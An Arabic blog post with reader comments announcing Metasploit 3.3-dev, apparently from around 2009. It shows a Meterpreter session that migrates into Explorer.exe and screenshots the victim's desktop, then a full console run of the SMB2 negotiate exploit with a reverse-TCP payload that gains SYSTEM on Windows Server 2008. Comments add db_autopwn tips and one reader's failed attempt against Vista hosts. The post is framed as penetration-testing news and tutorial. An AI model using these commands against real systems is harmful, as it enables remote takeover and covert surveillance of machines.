تطويرات وميزات جديدة في ميتا سبلويت 3.3-dev
بعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.
يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.
من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:
meterpreter > psProcess list
============
PID Name Path
— —- —-
204 iexplore.exe C:Program FilesInternet Exploreriexplore.exe
[ snipped ]
1736 Explorer.EXE C:WINDOWSExplorer.EXE
3348 sol.exe C:WINDOWSsystem32sol.exe
meterpreter > migrate 1736
[*] Migrating to 1736…
[*] Migration completed successfully.
meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.
أما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.
عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع Metasploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!
msf> use exploit/windows/smb/smb2_negotiate_func_indexmsf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)…
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:
auxiliary/scanner/smb/smb2
طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.
يمكن من هنا تحميل الحزمة الخاصة بنظام لينوكس وأنظمة Unix-like ومن هنا تحميل الحزمة الخاصة بأنظمة Windows.
لمزيد من المعلومات: Metasploit Blog – The Metasploit Project
لمن يريد شروحات عن مشروع ميتاسبلويت يمكنه الاطلاع على الروابط التالية من مدونتي:
– شرح استغلال ثغرات ميتاسبلويت بالتفصيل
– الاستخدمات المتقدمة لمشروع ميتاسبلويت
أو الاطّلاع على شروحات الفيديو التي تم طرحها مسبقاً في الموقع (الروابط بالأسفل)
اشكرك اخي عبدالمهيمن وبارك الله فيك
أشكركـ عبد المهيمن ووفقكـ الله
أريد أن أسأل هل تم إزآلة الأداة db_sqlite3 في هذا الإصدار..؟؟؟
db_sqlite3 ليست أداة بل اضافة للتعامل مع قواعد بيانات sqlite3 والجواب لا, لم يتم ازالتها من المشروع لكننا لم نعد بحاجة لتطبيق الأمر:
load db_sqlite3عندما نريد استخدام الأداة db_autopwn فالمشروع سيقوم بتحميل الاضافة بشكل تلقائي عند تشغيله ويمكننا أن نستخدم الأمر:
db_create databaseمباشرة لصنع قاعدة البيانات واكمال باقي الخطوات وفي حال أردت استخدام قواعد بيانات غير sqlite3 يمكنك تنفيذ الأمر:
db_driverلعرض نوع قاعدة البيانات التي نستخدمها حالياً, ولعرض الأنواع المتوفّرة وبتنفيذ الأمر:
db_driver mysqlيمكننا تغيير نوع قاعدة البيانات لـ mysql مثلا…
@diaa: المشروع يعمل على أنظمة Unix-like وليس لينوكس و ويندوز فقط, هذا يعني أنه يعمل على أنظمة BSD مثل FreeBSD و OpenBSD وعلى أنظمة Unix الأخرى وهذا يشمل نظام Mac OS X أيضا.
السلام عليكم
صراحة عجبني التطوير الجديد للميتا فيلو اشياء خطيييره جداً
لكني انتقلت لـ الابل
هل بإمكاني تنصيب الميتا على الماك بوك ؟؟ لإنه في الاصل يوجد تيرمنال فـ قلت يمكن استطيع !!
تحياتي
مشكوووووووور
هل يوجد في ثغرات الميتا ما يطبق من جهاز المخترق
بدون روابط للضحيه
مشروع اقل ما يقال عنه هائل
قطار وطريقه ماله اخر؟؟
دمت بود
مشكور وفعلا تم تجربتها اسرع وتحتوي علي ادوات كثيره
لكن عندي طلب الادوات التي توجد في auxiliary هل يمكن توفير شروحات لها حيث وصل عددها في اخر نسخه 141 فهي مفيده وتستخدم في عمليه
fuzz
,/salam
الله يعطيك العافية أخوي عبد المهين , والله معلومات جميله جداً
السلام عليكم ..
صرآحه إلى الآن لم أجرب النسخه الجديدة .. !
ولكني أتوق لتجربتها ..!
ولكن يجب علي الأنتظار .. لأني مشغول في الوقت الحالي .!
شكرا أخي عبدالمهيمن على هذا التوضيح البسيط عن الأصدار الجديد ..
وبأنتظار مواضيعك الشيقة !
صحيح مشروع رائع ولكن تشغيل مختلف عن سابقتها سهلة وبدون مشاكل إذا أمكن شرح تشغيلها
يعطيك العافية عبدو وكعادتك بتفاجئنا بكل جديد
شو أخبارك أول شي اشتقنا لك يا زلمة
عبدو عندي سؤال طبقت الأوامر للإصدار 3.3 على نظام فيستا
وهادا الي طلعلي مع اني طبقت على عدة اجهزة فيا ليت الحل
[*] Started reverse handler [*] Connecting to the target (192.168.1.65:445)…
[*] Sending the exploit packet (872 bytes)… [*] Waiting up to 180 seconds for exploit to trigger…
[*] Exploit completed, but no session was created.
msf exploit(smb2_negotiate_func_index) >
المشكلة في السطر الرابع
تحياتيـ الكـ
msf exploit(smb2_negotiate_func_index) >